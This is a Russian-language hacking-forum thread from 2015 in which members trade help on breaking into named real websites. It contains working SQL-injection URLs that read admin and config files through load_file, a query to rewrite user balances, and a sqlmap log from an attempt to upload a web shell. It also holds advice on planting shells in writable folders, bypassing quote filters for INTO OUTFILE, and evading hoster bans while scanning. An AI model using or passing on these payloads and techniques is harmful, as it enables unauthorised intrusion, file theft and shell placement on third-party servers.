Ваши вопросы по уязвимостям.

yarbabin · 17 Oct 2015

update adtram_users set count_rur = * where id=*

Kirza · 17 Oct 2015

yarbabin said: ↑

update adtram_users set count_rur = * where id=*
Click to expand...

почемут не получилось(

Если прав нет и не получится так понимаю.? и есть ли возможность их получить*
Это тизерка. За помощь дам фтп . тоесть на 2их будет

yarbabin · 17 Oct 2015

уточните все условия

Kirza · 17 Oct 2015

yarbabin said: ↑

уточните все условия
Click to expand...

+ Не заметил.
!!!!!!!!

BabaDook · 18 Oct 2015

Br@!ns said: ↑

вот вам раскрытие, с соседней сайта. лучше смотрите
http://media-monitor.ru/admin

www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--

http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'),3,4--

или под ваш ресурс поулчается - http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4--
Click to expand...

я СОСЕДНИЙ САЙТ ТОЖЕ СМОТРЕЛ.

/var/www/localhost/htdocs/media-monitor.ru/www/

/var/www/localhost/htdocs/media-monitor.ru/www/kernel/ такой путь догадка была ?

RedFern.89 · 18 Oct 2015

AlexG said: ↑

Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.
Click to expand...

все работает, спасибо. осталось лишь автоматизировать

AlexG · 18 Oct 2015

RedFern.89 said: ↑

все работает, спасибо. осталось лишь автоматизировать
Click to expand...

Ну раз работает, то это уже хорошо По автоматизации, как выше уже сказал yarbabin - php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.

kingbeef · 18 Oct 2015

aldemko said: ↑
С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
Я начал искать новые ресурсы для обучения и практики
и так ресурс:
http://www.aza.com.ua
phpinfdo http://www.aza.com.ua/info.php
страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html
немного о сервере
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0

current user: 'root@localhost'
current database: 'test'
current user is DBA: True

uniscan по ключу --qwe
показывает (если я правильно понял) папки с правами на запись
| Directory check:
| [+] CODE: 200 URL: http://www.aza.com.ua/banner/
| [+] CODE: 200 URL: http://www.aza.com.ua/cart/
| [+] CODE: 200 URL: http://www.aza.com.ua/conf/
| [+] CODE: 200 URL: http://www.aza.com.ua/doc/
| [+] CODE: 200 URL: http://www.aza.com.ua/email/
| [+] CODE: 200 URL: http://www.aza.com.ua/edit/
| [+] CODE: 200 URL: http://www.aza.com.ua/images/
| [+] CODE: 200 URL: http://www.aza.com.ua/img/
| [+] CODE: 200 URL: http://www.aza.com.ua/japan/
| [+] CODE: 200 URL: http://www.aza.com.ua/news/
| [+] CODE: 200 URL: http://www.aza.com.ua/orders/
| [+] CODE: 200 URL: http://www.aza.com.ua/pma/
| [+] CODE: 200 URL: http://www.aza.com.ua/quest/
| [+] CODE: 200 URL: http://www.aza.com.ua/user/

затем используя sqlmap-u сайт --os-cmd –v l
выбираю 4 (php)
затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:
Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
подскажите что я не так делаю ?
Проблема в пути который указываю в sqlmap
или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
или еще что то ?
спасибо
Click to expand...
Шелл туда давно уже залит)
http://forum.antichat.ru/threads/21336/page-796#post-3820554

aldemko · 18 Oct 2015

я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня

kingbeef · 18 Oct 2015

aldemko said: ↑

я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
Click to expand...

Пробуй заливать руками, а не софтом, ищи папку с правами, например папка с картинками.

Roger96 · 18 Oct 2015

Здравствуйте,вопрос в следующем, я правильно понимаю,что чтобы залить шелл надо иметь доптуп к админке а соответственно знать логин пасс, дак ведь их можно узнать только через уязвимость а если у меня будет такая уязвимость значит я смогу и слить базу соответственно зачем мне уже заливать шелл дак вот вопрос заключается в следующем: как залить шелл незная логина и пароля админа?

ButilkaSoka · 18 Oct 2015

Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку \' /путь \'

yarbabin · 18 Oct 2015

ButilkaSoka said: ↑

Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку \' /путь \'
Click to expand...

прочитайте в большом факе условия для заливки. и способ scipio

R3hab · 18 Oct 2015

HTML:
www_europarchive_org/item.php?id=lp-00624_BeG
как можно раскрутить?

kingbeef · 18 Oct 2015

ButilkaSoka said: ↑

Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку \' /путь \'
Click to expand...

Единственный вариант при фильтрации ковычек, работает редко.
http://forum.antichat.ru/threads/43966/page-2#post-663815

Win32BOT · 18 Oct 2015

Как посмотреть файловые привилегии пользователя в MariaDB?
По MySQL все понятно:
http://localhost/sql/test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='root'--+
Помогите разобраться

yarbabin · 18 Oct 2015

Win32BOT said: ↑

Как посмотреть файловые привилегии пользователя в MariaDB?
По MySQL все понятно:
http://localhost/sql/test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='root'--+
Помогите разобраться
Click to expand...

https://mariadb.com/kb/en/mariadb/mysqluser-table/
И вообще достаточно прочитать какой-нибудь файл через load_file()

AlexG · 18 Oct 2015

R3hab said: ↑
HTML:
www_europarchive_org/item.php?id=lp-00624_BeG
как можно раскрутить?
Click to expand...
Реально интересный пример.
Видно часть запроса, но чет ничего не получается.
Code:
http://www.europarchive.org/item.php?id=lp-00624_BeG'
Мастера, будьте любезны - просветите что тут и как.

Br@!ns · 18 Oct 2015

R3hab said: ↑
HTML:
www_europarchive_org/item.php?id=lp-00624_BeG
как можно раскрутить?
Click to expand...
С этой непонятно, но рядом есть другая
http://www.europarchive.org/userCon...oken=421e73828fd4888cd36749ee1ad64a50f4622c89

Думаю вам сюда http://forum.antichat.ru/threads/35599/

kacergei · 18 Oct 2015

ПОдскажите как избежать бана вот этого хостера hostpro.ua
Как выставлять кол-во запросов в таких приложениях как fierce, nikto, unicorn
сразу в бан ухожу((

Ваши вопросы по уязвимостям.

yarbabin HACKIN YO KUT

Kirza Member

yarbabin HACKIN YO KUT

Kirza Member

BabaDook Well-Known Member

RedFern.89 Member

AlexG Member

kingbeef Reservists Of Antichat

aldemko Member

kingbeef Reservists Of Antichat

Roger96 New Member

ButilkaSoka Member

yarbabin HACKIN YO KUT

R3hab Member

kingbeef Reservists Of Antichat

Win32BOT Member

yarbabin HACKIN YO KUT

AlexG Member

Br@!ns Elder - Старейшина

kacergei Member

Useful Searches

Ваши вопросы по уязвимостям.

yarbabin HACKIN YO KUT

Kirza Member

yarbabin HACKIN YO KUT

Kirza Member

BabaDook Well-Known Member

RedFern.89 Member

AlexG Member

kingbeef Reservists Of Antichat

aldemko Member

kingbeef Reservists Of Antichat

Roger96 New Member

ButilkaSoka Member

yarbabin HACKIN YO KUT

R3hab Member

kingbeef Reservists Of Antichat

Win32BOT Member

yarbabin HACKIN YO KUT

AlexG Member

Br@!ns Elder - Старейшина

kacergei Member